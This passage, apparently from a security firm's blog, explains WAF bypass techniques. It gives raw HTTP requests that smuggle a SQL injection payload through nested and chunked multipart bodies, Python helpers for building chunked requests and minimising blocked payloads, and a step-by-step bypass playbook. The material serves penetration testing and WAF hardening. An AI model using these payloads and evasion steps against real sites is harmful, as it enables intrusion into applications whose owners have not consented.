Nesting a multipart/mixed block inside a multipart/form-data body creates a two-level structure that most WAFs do not recursively inspect. The payload lives in the inner layer, invisible to a WAF that only parses the outer envelope.

POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=--OuterBoundary

----OuterBoundary
Content-Disposition: form-data; name="file"
Content-Type: multipart/mixed; boundary=--InnerBoundary

----InnerBoundary
Content-Disposition: attachment; filename="data.txt"

' UNION SELECT 1,2,3--
----InnerBoundary--
----OuterBoundary--

The WAF inspects the outer part and sees a file upload. The backend recursively parses the inner multipart block and passes the payload to the application.

Chunked + multipart combination

Wrapping a multipart body inside a chunked transfer request forces the WAF to handle two reassembly mechanisms simultaneously. Most WAFs manage one correctly. Both together is a challenge many fail.

POST /search HTTP/1.1
Content-Type: multipart/form-data; boundary=----Boundary
Transfer-Encoding: chunked

24
------Boundary
Content-Disposition:
18
 form-data; name="q"


E
' UNION SELECT
A
 1,2,3--

12
------Boundary--

0

The WAF would need to first reassemble the chunked body, then parse the resulting multipart structure, then inspect the reconstructed field value. A three-step process that many production WAF deployments fail to complete correctly.
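
Chunk sizes are hexadecimal byte counts that include every CRLF inside the chunk, so they are easier to compute than to write by hand. The sketch below builds a multipart body, splits it at chosen offsets, and reverses the process the way a compliant backend would. All function names are ours.

```python
def multipart_body(boundary: str, field: str, value: str) -> bytes:
    """Build a single-field multipart/form-data body with CRLF line endings."""
    lines = [
        f"--{boundary}",
        f'Content-Disposition: form-data; name="{field}"',
        "",
        value,
        f"--{boundary}--",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def chunk(body: bytes, sizes: list[int]) -> bytes:
    """Encode body as chunks of the given sizes; the remainder goes last."""
    out = bytearray()
    pos = 0
    for size in sizes + [len(body)]:
        piece = body[pos:pos + size]
        if not piece:
            break
        out += f"{len(piece):X}\r\n".encode("ascii") + piece + b"\r\n"
        pos += len(piece)
    out += b"0\r\n\r\n"  # terminating zero-length chunk
    return bytes(out)


def dechunk(data: bytes) -> bytes:
    """Reassemble a chunked body (no trailers or chunk extensions)."""
    out = bytearray()
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol], 16)
        if size == 0:
            return bytes(out)
        start = eol + 2
        out += data[start:start + size]
        pos = start + size + 2  # skip the CRLF that ends the chunk
```

For instance, chunk(multipart_body("----Boundary", "q", "' UNION SELECT 1,2,3--"), [36, 24, 14, 10]) cuts the header line and the SQL payload in two, while dechunk() on the result returns the original body unchanged.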

ℹ️ Further reading

The full WAFFLED paper is available here

The Playbook

Methodology matters more than any individual technique. Here is the repeatable workflow behind every successful bypass in this article.

1. Fingerprint: Identify the WAF using wafw00f or other tools, response headers, error page signatures, and timing behavior. Knowing the vendor narrows down which rulesets and detection paradigms are in play.

2. Probe: Find an attack vector and send known-bad payloads. Map which ones get blocked, which pass through, and what response codes you get (403, 406, 503). You are building a picture of the ruleset's coverage.

3. Try misconfigurations first: Before touching the ruleset, go back to the misconfiguration section. Look for direct origin exposure, header spoofing, trust-based exclusions, and request body inspection size limits. A misconfiguration bypass costs nothing and leaves no obfuscation traces.

4. Search before you craft: Before spending time building a custom payload, check if someone has already done it. WAF bypasses are frequently shared publicly on social media, bug bounty write-ups, and research blogs. Here is a useful Google dork:

"<WAF name>" "bypass" "payload" site:github.com OR site:medium.com OR site:hackerone.com OR site:twitter.com

If nothing turns up, make your own.

5. Isolate: If no misconfiguration applies, strip the blocked payload down to its minimum. Remove characters one by one until you find the exact token or string causing the block. Is it UNION? SELECT? The quote character? The combination? Knowing the exact trigger is everything.

6. Obfuscate: Apply the appropriate technique to that specific token. Fragment it with comments or concatenation. Encode it. Reconstruct it from char codes. The technique depends on the context.

7. Layer: Add a second and third obfuscation layer on top. Case variation on another keyword. Whitespace substitution on the separator. Unicode escape on a character inside the encoded token. Each layer plugs the gaps left by the others.

8. Validate: Confirm the payload actually executes on the backend. Check for behavioral indicators: query results, reflected output, triggered callbacks.

9. Iterate: If blocked again, return to step 4. The loop is the methodology.
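
The Isolate step can be partly automated. The sketch below greedily removes characters as long as the request is still blocked, leaving only the trigger. The is_blocked callable is a hypothetical oracle: in a real engagement it would send the candidate and report whether the WAF blocked it, which also means one request per attempt, so the stealth concerns discussed earlier apply.

```python
import re
from typing import Callable


def minimize(payload: str, is_blocked: Callable[[str], bool]) -> str:
    """Drop every character that is not needed to trigger the block."""
    current = payload
    i = 0
    while i < len(current):
        candidate = current[:i] + current[i + 1:]
        if candidate and is_blocked(candidate):
            current = candidate  # this character was irrelevant to the block
        else:
            i += 1               # this character is part of the trigger
    return current


def toy_waf(value: str) -> bool:
    """Stand-in oracle for illustration: blocks UNION followed by SELECT."""
    return re.search(r"union\s+select", value, re.I) is not None
```

Against the toy oracle, minimize("1' UNION SELECT 1,2,3-- -", toy_waf) reduces the payload to UNION SELECT, which tells us the quote, the columns, and the comment are not what the rule matches on.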

The following diagram describes the methodology to find a valid WAF bypass:

WAF Bypass Methodology Workflow

Conclusion

Even if payload obfuscation is not the stealthiest technique, it remains the most versatile one. Unlike misconfigurations, it is not tied to a specific target or deployment. If you want a quick win, misconfiguration and protocol-level attacks will always be the better first move. But when those do not apply, crafting and obfuscating your payload is the last reliable path forward.

Every bypass in this article follows the same principle: the WAF and the backend do not speak the same language, and that gap is fundamental to how the modern web works. The hardest truth is that every bypass is only possible because the underlying application is vulnerable. A WAF is just a bandage on insecure code, never a substitute for secure development.

Don't trust your WAF blindly. Test it. Break it. And then fix what's behind it.

If you would like to learn more about our security audits and explore how we can help you, get in touch with us!

Source: http://blog.quarkslab.com/in-waf-we-should-not-trust.html